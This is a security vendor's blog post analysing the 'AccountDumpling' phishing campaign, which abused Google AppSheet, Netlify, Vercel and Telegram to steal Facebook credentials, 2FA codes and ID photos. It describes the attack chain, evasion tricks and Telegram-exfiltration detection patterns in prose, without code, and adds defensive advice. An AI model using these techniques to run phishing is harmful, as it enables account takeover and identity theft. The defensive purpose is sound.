• Home
  • About
  • Locations
logologologologo
  • Plan
    • vCISO
    • Policies & Procedures
    • Strategy & Security Program Creation
    • Risk Management
  • Attack
    • Penetration Testing
    • PTaaS
    • Red Teaming
    • Web Application Penetration Testing
    • Mobile Application Penetration Testing
    • IOT Penetration Testing
  • Defend
    • Office 365 Security
    • HIPAA Compliance
    • PCI Compliance
    • Code Reviews
    • Blockchain Security Analysis
    • Vulnerability Assessments
  • Recover
    • Ransomware Recovery
    • Expert Witness
    • Forensics
  • Learn
    • Resources
    • Penetration Testing Training
    • Blog
  • Contact Us
  • Instant Quote
✕

Google AppSheet Phishing Hits Facebook Accounts

May 3, 2026

Meta Description

Google AppSheet phishing abused Netlify and Telegram to steal Facebook credentials, 2FA codes, IDs, and business account data.

Introduction

Phishing works best when the message looks trusted before the victim even reads it.

That is exactly what made the AccountDumpling campaign so dangerous.

Instead of sending phishing emails from suspicious domains or poorly configured mail servers, attackers abused Google AppSheet’s legitimate notification system. The result was a phishing email that came from real Google-controlled infrastructure, passed normal authentication checks, and appeared far more trustworthy than a typical scam message.

The campaign targeted Facebook users, page administrators, and Facebook Business account owners with urgent Meta-themed warnings.

Victims were told their accounts had been disabled, reported for copyright violations, flagged for policy issues, selected for blue badge review, or involved in suspicious login activity.

From there, the attack expanded into a full criminal pipeline involving:

  • Google AppSheet
  • Netlify-hosted phishing pages
  • Vercel-hosted phishing flows
  • Google Drive PDFs
  • Canva-generated documents
  • Fake recruiter lures
  • Telegram bots
  • Real-time operator panels
  • Credential theft
  • 2FA code collection
  • Government ID harvesting
  • Facebook Business account takeover

Researchers estimated that about 30,000 Facebook accounts were compromised.

This is not a traditional CVE-driven attack.

There is no confirmed vulnerability exploitation behind the campaign.

The weakness is trust.

Attackers abused trusted cloud platforms, familiar brand names, verified-looking emails, and urgent account recovery workflows to manipulate users into handing over everything needed to take control of valuable Facebook accounts.

For companies, creators, agencies, and social media teams, the lesson is clear:

A phishing email can pass SPF, DKIM, and DMARC and still be dangerous.

What Happened

A sophisticated phishing operation known as AccountDumpling targeted Facebook users and Facebook Business account owners worldwide.

The campaign used Google AppSheet as the initial phishing relay.

AppSheet is a legitimate Google no-code platform used to build apps, automate workflows, and send app-driven notifications. Attackers abused that notification functionality to send phishing emails that appeared to come from trusted Google infrastructure.

The emails were sent from AppSheet-related addresses and passed normal email authentication checks.

That made the messages harder for security tools and users to distrust.

The lures focused on Meta and Facebook account pressure.

Victims received messages claiming:

  • Their Facebook account had a policy violation
  • Their page was at risk of permanent deletion
  • They needed to appeal a copyright complaint
  • Their business account required verification
  • They were eligible for blue badge review
  • A suspicious login had been detected
  • A recruiter from a major brand wanted to contact them

The destination varied by cluster.

Some victims were sent to Netlify-hosted fake Facebook Help Center pages. Others were sent to Vercel-hosted Meta verification flows. Some were directed through Google Drive-hosted PDFs generated through Canva. Others were approached through fake job offer narratives impersonating well-known brands.

The final goal remained consistent:

Steal Facebook credentials, 2FA codes, recovery information, personal data, business information, and identity documents.

Telegram was used as a central exfiltration channel.

Stolen data flowed into private Telegram channels where operators could monitor victim submissions in real time.

In some cases, the phishing kits supported live operator control, allowing attackers to react while the victim was still interacting with the page.

That made the campaign more than a static phishing kit.

It operated like a coordinated account hijacking business.

Why This Issue Is Critical

This issue is critical because it abuses trusted platforms to bypass user suspicion and security filtering.

Many organizations train users to look for suspicious senders, strange domains, broken formatting, and failed authentication checks.

AccountDumpling undermines that model.

The email came from Google AppSheet infrastructure. Authentication passed. The message did not need traditional spoofing. The link paths used platforms people recognize, including Google Drive, Netlify, Vercel, and Canva-generated files.

That creates a trust inversion.

The delivery platform is legitimate, but the message is malicious.

This is especially dangerous for Facebook Business accounts.

A compromised Facebook Business account can expose:

  • Ad accounts
  • Payment methods
  • Business pages
  • Brand assets
  • Customer messages
  • Campaign analytics
  • Admin access
  • Recovery data
  • Connected Instagram accounts
  • Business Manager permissions

For agencies, media teams, influencers, SMBs, and ecommerce brands, losing access to a Facebook account can create immediate business disruption.

Attackers may use hijacked accounts to:

  • Run fraudulent ads
  • Abuse stored payment methods
  • Sell the account
  • Lock out the rightful owner
  • Impersonate the brand
  • Target customers with scams
  • Demand payment for recovery
  • Resell access in underground markets

The campaign also collected more than passwords.

Some phishing flows requested dates of birth, phone numbers, government-issued ID photos, screenshots, business details, and multiple rounds of 2FA codes.

That is not just credential theft.

It is identity capture.

What Caused the Issue

The AccountDumpling campaign was caused by a combination of trusted platform abuse, social engineering, cloud-hosted phishing infrastructure, and weak account recovery controls.

There is no confirmed CVE involved.

The campaign worked because attackers understood how to exploit trust relationships.

Google AppSheet Abuse

Attackers used AppSheet’s legitimate email notification system to send phishing messages from trusted Google infrastructure.

This allowed messages to pass normal authentication checks.

Meta-Themed Panic Lures

The emails used urgency to pressure victims.

Warnings about account deletion, copyright complaints, policy violations, and login alerts are effective because Facebook Business accounts often have real financial value.

Netlify and Vercel Hosting

Attackers hosted phishing pages on trusted cloud platforms.

In many cases, unique victim-specific Netlify subdomains helped avoid blocklists because each phishing URL had a short life and limited reuse.

Google Drive and Canva Abuse

Some lures used Google Drive-hosted PDFs generated with Canva.

This gave victims a familiar document-sharing experience before sending them into a phishing flow.

Telegram Exfiltration

Telegram bots and channels received stolen credentials and identity data in real time.

That made the campaign easier to operate and scale.

Real-Time Operator Control

Some phishing panels allowed attackers to guide victims through the login and verification process live.

That helped attackers collect valid credentials, 2FA codes, ID documents, and screenshots.

Detection Evasion

The campaign used tactics such as invisible Unicode characters, Cyrillic homoglyphs, mid-word text breaking, random URLs, localization, anti-debugging scripts, encrypted local storage, shortened links, and iframe-based hiding.

These techniques made detection harder for automated tools and human reviewers.

How the Attack Chain Works

The AccountDumpling attack chain follows a cloud-abuse phishing model.

It turns trusted platforms into stepping stones for account takeover.

Initial Phishing Email

The victim receives a Meta-themed message sent through Google AppSheet.

The email appears authenticated because it comes from legitimate Google-controlled infrastructure.

Urgency or Reward Lure

The message creates pressure or temptation.

Examples include account disablement, copyright complaint, blue badge review, advertiser reward, suspicious login, or executive recruitment.

Cloud Redirect

The victim clicks the call-to-action link.

Depending on the cluster, the link may lead to Netlify, Vercel, Google Drive, a shortened URL chain, or an attacker-controlled site.

Fake Facebook or Meta Page

The victim lands on a polished phishing page that imitates Facebook, Meta Business, Privacy Center, Security Check, or Help Center workflows.

The page may include fake CAPTCHA checks, countdown timers, localized language, or full-screen iframe tricks.

Credential and Profile Collection

The victim is asked to submit personal and account data.

This may include:

  • Name
  • Email address
  • Phone number
  • Date of birth
  • Business information
  • Facebook password
  • 2FA codes
  • Government ID photos
  • Browser screenshots

Forced Retry

Some flows intentionally reject the first password attempt.

This forces the victim to enter credentials again, increasing the attacker’s confidence that the password is correct.

Real-Time Operator Review

In advanced flows, operators interact with the victim session live through WebSocket-based panels.

They can test credentials, request more information, trigger additional screens, and guide the victim through the process.

Telegram Exfiltration

The stolen data is sent to Telegram bots or private channels.

Operators receive victim data quickly and can act before the victim understands what happened.

Account Takeover

Attackers log into the Facebook account, change recovery details, lock out the original owner, abuse ad accounts, or resell the account through illicit channels.

Monetization

The stolen accounts can be sold, used for fraudulent ads, abused for payment methods, or offered back through so-called recovery services.

Why This Incident Matters for Cybersecurity

This incident matters because it shows how phishing has evolved into a platform-abuse business model.

Attackers no longer need to rely on obviously suspicious domains.

They can build campaigns on trusted services.

That changes the security problem.

A domain reputation tool may trust Google AppSheet.

A user may trust a Google Drive link.

A browser may not flag a Netlify or Vercel domain.

A security gateway may see SPF, DKIM, and DMARC pass.

A victim may recognize Meta branding and react quickly because they fear losing business access.

The campaign also shows how phishing operations are becoming modular.

One actor may build the kit.

Another may send the campaign.

Another may operate Telegram channels.

Another may monetize stolen accounts.

This makes disruption harder because the operation can continue even if one component is removed.

For businesses, the incident matters because social media accounts are now operational assets.

A Facebook Business account may control advertising spend, customer communication, brand identity, commerce workflows, and audience access.

Losing it can cause financial loss, reputational damage, customer confusion, and direct fraud.

This is why social media account protection must be part of cybersecurity strategy.

It is not just a marketing issue.

Common Risks Highlighted by the Incident

The AccountDumpling campaign highlights several serious risks.

Trusted Platform Abuse

Attackers used Google AppSheet, Netlify, Vercel, Google Drive, Canva, and Telegram to make the campaign look legitimate and scalable.

Authenticated Phishing Emails

The emails passed authentication because they were sent through a legitimate service.

This proves that authentication validates the sender platform, not the intent of the message.

Facebook Business Account Takeover

Business accounts have financial and operational value.

Attackers can abuse ad accounts, payment methods, pages, and connected assets.

2FA Code Theft

Some phishing flows collected 2FA codes in real time.

This can defeat weaker MFA approaches when users enter codes into phishing pages.

Government ID Harvesting

Some pages requested ID photos and recovery information.

That creates identity theft and account recovery abuse risk.

Telegram-Based Exfiltration

Telegram bots gave attackers a fast and convenient way to receive stolen data.

Unique URL Evasion

Per-victim Netlify subdomains and random paths made blocklisting less effective.

Live Operator Panels

Real-time control allowed attackers to adjust the phishing flow while victims were still engaged.

Homoglyph and Unicode Evasion

Invisible characters, Cyrillic homoglyphs, and broken text patterns helped evade simple string-based detection.

Potential Impact on Organizations

The impact of this campaign can be significant for any organization using Facebook, Meta Business Suite, Instagram, or paid advertising.

Potential consequences include:

  • Facebook page takeover
  • Meta Business Manager compromise
  • Instagram account compromise
  • Ad account abuse
  • Stored payment method abuse
  • Fraudulent advertising spend
  • Customer scams from trusted pages
  • Loss of brand control
  • Business interruption
  • Data exposure from page messages
  • Theft of ID documents
  • Account recovery lockout
  • Financial loss
  • Reputation damage
  • Customer support burden
  • Legal and compliance review

For marketing agencies, the risk is even higher.

Agencies often manage multiple client pages and ad accounts. One compromised administrator account could expose multiple brands.

For SMBs, the impact can be immediate.

A stolen business page can interrupt sales, customer communications, paid campaigns, and brand visibility.

For influencers and creators, losing a Facebook or Instagram account can mean losing audience access and revenue.

The campaign also creates downstream risks.

Attackers who control a trusted business page can use it to launch more scams against followers, customers, advertisers, and partners.

What Organisations Should Do Now

Organizations should treat Facebook Business access as a security-sensitive asset.

Recommended actions include:

  • Review all Facebook Business Manager administrators
  • Remove inactive or unnecessary admin accounts
  • Enforce strong MFA on all Meta business accounts
  • Use phishing-resistant MFA where available
  • Review recent login history and device activity
  • Check for unknown page roles or business users
  • Review ad account payment methods
  • Monitor unexpected ad campaigns or spending spikes
  • Watch for Meta-themed phishing emails sent through trusted platforms
  • Train users not to click account appeal links in emails
  • Navigate directly to Meta Business Suite instead of using email links
  • Report suspicious AppSheet-originated Meta warnings
  • Inspect Google Drive PDFs claiming to be Meta notices
  • Block known phishing infrastructure where possible
  • Monitor Netlify and Vercel links in suspicious emails
  • Review Telegram bot exfiltration indicators from phishing kits
  • Establish recovery procedures for hijacked social accounts
  • Include social media account takeover in incident response planning

Employees should be told one simple rule:

Do not resolve Facebook account warnings from email links.

Go directly to the official Meta Business Suite or account center.

Detection and Monitoring Strategies

Detection should focus on email context, link behavior, cloud-hosted phishing pages, and social account activity.

Security teams should monitor for:

  • AppSheet-originated emails impersonating Meta
  • Messages from noreply@appsheet.com with  Facebook or Meta urgency language
  • Links to Netlify subdomains in Meta-themed emails
  • Links to Vercel-hosted Meta verification pages
  • Google Drive PDFs claiming account violations or verification requirements
  • Canva-generated PDF metadata in phishing reports
  • Shortened URL chains leading to cloud-hosted phishing
  • Full-screen iframe behavior hiding the real destination
  • Fake CAPTCHA pages before Meta login flows
  • Forced password retry behavior
  • Requests for government ID photos
  • Requests for browser screenshots
  • Telegram bot tokens in phishing page source
  • JavaScript posting to Telegram-related endpoints
  • Unicode homoglyphs in sender display names
  • Invisible Unicode characters in email headers or display names
  • Mid-word text splitting in email bodies
  • New Facebook Business admin users
  • Unknown devices logged into Facebook accounts
  • New payment activity in Meta ad accounts
  • Unexpected ad campaign creation
  • Page role changes
  • Instagram account connection changes

Security teams should correlate:

  • Secure email gateway logs
  • Browser telemetry
  • DNS logs
  • Proxy logs
  • CASB alerts
  • Endpoint telemetry
  • Meta Business activity logs
  • Payment method alerts
  • User reports
  • Threat intelligence feeds

Because the campaign uses trusted platforms, simple domain reputation is not enough.

Detection must consider message intent, brand impersonation, link chain behavior, and the sensitivity of the requested action.

The Role of Incident Response Planning

Organizations need response plans for social media account compromise.

Many incident response plans focus on ransomware, endpoint compromise, email compromise, and cloud account takeover.

But for marketing-heavy businesses, Facebook and Instagram accounts can be just as operationally important.

A strong response plan should include:

  • Immediate lockout containment steps
  • Meta account recovery contacts
  • Proof-of-ownership preparation
  • Admin role review
  • Password resets
  • MFA reset and re-enrollment
  • Session revocation
  • Ad account payment review
  • Fraudulent campaign shutdown
  • Customer communication templates
  • Legal and compliance escalation
  • Evidence preservation
  • Review of email phishing artifacts
  • Review of employee devices involved in the compromise
  • Coordination with marketing, finance, legal, and security teams

Incident responders should answer:

  • Who clicked the phishing link?
  • What information was submitted?
  • Were 2FA codes entered?
  • Were government IDs uploaded?
  • Was the Facebook account accessed?
  • Were admin roles changed?
  • Were recovery details changed?
  • Was ad spend abused?
  • Were customers contacted by attackers?
  • Were connected Instagram accounts affected?
  • Were payment methods charged?
  • Were other employees targeted?

The faster these questions are answered, the faster the organization can regain control and reduce harm.

The Role of Penetration Testing

Penetration testing can help organizations understand whether trusted-platform phishing would bypass their current defenses.

A standard technical penetration test may not fully cover this risk.

Organizations should include social engineering, phishing simulation, cloud platform abuse scenarios, and account takeover testing.

A strong assessment can evaluate:

  • Whether AppSheet-originated phishing messages reach inboxes
  • Whether users trust authenticated emails too much
  • Whether Netlify and Vercel phishing links are detected
  • Whether Google Drive PDF lures are inspected
  • Whether users recognize fake Meta account warnings
  • Whether employees submit credentials to fake appeal pages
  • Whether 2FA codes can be phished
  • Whether marketing teams know account recovery procedures
  • Whether Meta Business admin permissions are excessive
  • Whether social media accounts have proper MFA
  • Whether suspicious ad activity is detected quickly
  • Whether incident response teams can recover hijacked accounts

A red team exercise can safely simulate the attack path:

  • Send a controlled Meta-themed phishing lure
  • Use a safe fake landing page
  • Test whether users click account appeal links
  • Measure whether credentials would be submitted
  • Check whether security tools flag the cloud-hosted link
  • Test reporting behavior
  • Review SOC detection
  • Validate incident response escalation
  • Confirm marketing team recovery steps

This kind of testing helps answer a critical question:

If attackers targeted your social media admins tomorrow, would your business know before the account was gone?

Penetration testing should include the platforms that matter to the business, not only servers and web applications.

Protection and Mitigation Measures

Organizations should use layered controls to reduce the risk of trusted-platform phishing and Facebook Business account takeover.

Secure Meta Business Accounts

Use strong MFA on every account with page, ad, or Business Manager access.

Remove inactive users and reduce admin permissions.

Limit Administrative Access

Use least privilege for social media accounts.

Not every marketer needs full admin rights.

Train Users on Trusted-Platform Phishing

Employees should understand that Google AppSheet, Google Drive, Netlify, Vercel, and Canva can be abused.

Trusted hosting does not make a message safe.

Avoid Email-Based Account Recovery Links

Users should go directly to official Meta portals instead of clicking appeal links in emails.

Monitor Ad Account Activity

Alert on new campaigns, unusual budget increases, new payment methods, or geographic anomalies.

Review Page Roles Regularly

Check for unknown admins, editors, business users, partner access, and connected assets.

Use Browser and Email Isolation

High-risk links in email should be opened in isolated environments where possible.

Inspect Cloud-Hosted Links

Security tools should analyze the full redirect chain, not just the first trusted platform.

Block Known Phishing Patterns

Look for Meta panic language, fake policy violation wording, blue badge lures, and suspicious account recovery flows.

Detect Telegram Exfiltration

Inspect suspicious phishing kits for Telegram bot tokens, chat IDs, and related API calls.

Prepare Recovery Evidence

Keep business ownership records, domain verification, ID requirements, ad account details, and Meta support paths ready before an incident.

Strengthen Executive and Marketing Security

Marketing teams, social media managers, and executives should receive targeted phishing training because they are common targets.

Run Regular Security Testing

Test whether employees, tools, and response teams can detect and contain trusted-platform phishing.

Key Takeaway

The AccountDumpling campaign shows how modern phishing operations are abusing trusted cloud platforms to compromise high-value social media accounts.

By using Google AppSheet to send authenticated phishing emails, attackers created messages that passed normal trust checks. By using Netlify, Vercel, Google Drive, Canva, and Telegram, they built a scalable account hijacking operation that collected credentials, 2FA codes, personal details, government ID photos, and business account data.

There is no confirmed CVE behind this campaign.

The attack works because trusted platforms are being used for untrusted intent.

For organizations, this means phishing detection must go beyond sender authentication and domain reputation. Security teams need context-aware email analysis, user training, cloud-link inspection, social media account protection, incident response planning, and penetration testing that includes trusted-platform phishing scenarios.

The message is simple:

An email can come from Google and still be part of an attack.

Trust the context, not just the platform.

Contact Us Now to Prepare
for Digital Warfare


      • info@digitalwarfare.com

      • +1 757-900-9968

Share
Copyright © Digital Warfare. All rights reserved.
  • Home
  • About
  • Locations